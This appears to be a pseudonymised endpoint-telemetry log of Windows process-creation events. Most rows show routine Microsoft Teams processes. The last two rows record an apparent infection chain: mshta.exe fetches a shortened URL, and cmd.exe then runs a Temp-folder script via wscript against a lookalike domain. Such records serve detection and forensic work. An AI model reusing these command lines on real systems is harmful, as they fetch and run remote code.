01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:45.597887+00:00,2021-06-24 11:01:05.200277+00:00,637e2f42-fe98-4a6f-b245-7d65cb517f24,computerpii_0a470890c60768167990033d701e7bd881398861,179521,False,10.7740.19041.1052,False,11540474045177893,,11540474045177898,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+322,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:45.670454300+00:00,13288,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --enable-sandbox --native-window-open --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\renderer\notifications\FilePII_e9b204e348814796c2a61feffc49c5ba27a5f5d5.js"" --background-color=#fff --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:1 --msteams-process-type=notificationsManager",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:45.687487500+00:00,2021-06-24 11:01:05.200422700+00:00,9f0781af-cd51-4beb-83b9-9b2a170d143d,computerpii_0a470890c60768167990033d701e7bd881398861,179524,False,10.7740.19041.1052,False,11540474045177893,,11540474045177901,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+323,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:45.921717800+00:00,7632,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --webview-tag --enable-sandbox --native-window-open --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\renderer\FilePII_88702fd66fe3a1d7874360abd7c4f15c0cdd6a77.js"" --background-color=#fff --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1 --msteams-process-type=main-renderer --msteams-rendererid=main-renderer",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:45.965601600+00:00,2021-06-24 11:01:05.200815200+00:00,f59ea900-84c0-496a-ad5b-f315c60c991e,computerpii_0a470890c60768167990033d701e7bd881398861,179532,False,10.7740.19041.1052,False,11540474045177893,,11540474045177902,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+324,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:46.106046700+00:00,9368,Teams.exe,"""Teams.exe"" --type=utility --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=audio --enable-wer --ms-teams-less-cors=522133263 --electron-shared-settings=eyJ********** --mojo-platform-channel-handle=3680 /prefetch:8",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:46.169665600+00:00,2021-06-24 11:01:05.201161200+00:00,bff24e4d-e12f-4713-95de-cfe1049f76f1,computerpii_0a470890c60768167990033d701e7bd881398861,179539,False,10.7740.19041.1052,False,11540474045177893,,11540474045177907,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+325,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:54.564508500+00:00,16552,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --enable-sandbox --native-window-open --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\renderer\experienceRenderer\FilePII_81eb8107464d558b2d7094d41551620aa9ac0a03.js"" --background-color=#fff --guest-instance-id=5 --enable-blink-features --disable-blink-features --hidden-page --node-integration-in-subframes --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:1 --msteams-process-type=experience-renderer",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:54.618401+00:00,2021-06-24 11:01:05.202515100+00:00,8713d1d4-082a-436f-ac30-e4844eba99d3,computerpii_0a470890c60768167990033d701e7bd881398861,179563,False,10.7740.19041.1052,False,11540474045177893,,11540474045177912,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+326,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:54.947121200+00:00,19764,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --no-sandbox --no-zygote --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\pluginhost\FilePII_362d0e2af8f9714023b734d6d78e953a406c079a.js"" --background-color=#fff --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1 --msteams-process-type=pluginHost",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:55.063962100+00:00,2021-06-24 11:01:05.202713400+00:00,385deeef-56ad-441d-90cc-c519690eef9e,computerpii_0a470890c60768167990033d701e7bd881398861,179567,False,10.7740.19041.1052,False,11540474045177893,,11540474045177915,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,1.0,20481.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+327,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:55.669840400+00:00,13672,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_5b9316c3f180bcca68d5fb993680c5cd9240ffc5.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_5b9316c3f180bcca68d5fb993680c5cd9240ffc5.js"" page.googledocpage.com/ 2",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,0b4340ed812dc82ce636c00fa5c9bef2,dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895,51c97ebe601ef079b16bcd87af827b0be5283d96,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:46.807666+00:00,15476,mshta.exe,"""mshta.exe"" https://bit.ly/3zGwwx7",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:55.917929600+00:00,2021-06-24 11:01:05.202814600+00:00,a08a1c49-f1bb-40e8-9c73-db569c0014b5,computerpii_0a470890c60768167990033d701e7bd881398861,179569,False,10.7740.19041.1052,False,11540474045177908,,11540474045177916,2021-06-24 10:59:46.807666+00:00,15476,2021-06-24 10:59:46.807666+00:00,\Device\HarddiskVolume3\Windows\System32\mshta.exe,15476,18560,TerminateProcessStartkey,C:\Windows\System32,14848,1979-10-11 17:42:52+00:00,2019-12-07 09:09:39.756421400+00:00,2021-06-24 10:59:46.810347700+00:00,2019-12-07 09:09:39.756421400+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,7.0,2049.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Internet Explorer,11.00.19041.1,MSHTA.EXE,MSHTA.EXE,Microsoft (R) HTML Application host,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+328,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:55.723124400+00:00,3256,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:55.669840400+00:00,13672,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_5b9316c3f180bcca68d5fb993680c5cd9240ffc5.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_5b9316c3f180bcca68d5fb993680c5cd9240ffc5.js"" page.googledocpage.com/ 2",False,2021-06-24 10:59:46.807666+00:00,15476,\Device\HarddiskVolume3\Windows\System32\mshta.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:55.951522700+00:00,2021-06-24 11:01:05.202948400+00:00,af11800c-a37b-48a9-b749-83ec91a616d5,computerpii_0a470890c60768167990033d701e7bd881398861,179572,False,10.7740.19041.1052,False,11540474045177916,,11540474045177917,2021-06-24 10:59:55.669840400+00:00,13672,2021-06-24 10:59:55.669840400+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,13672,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 10:59:30.485947200+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
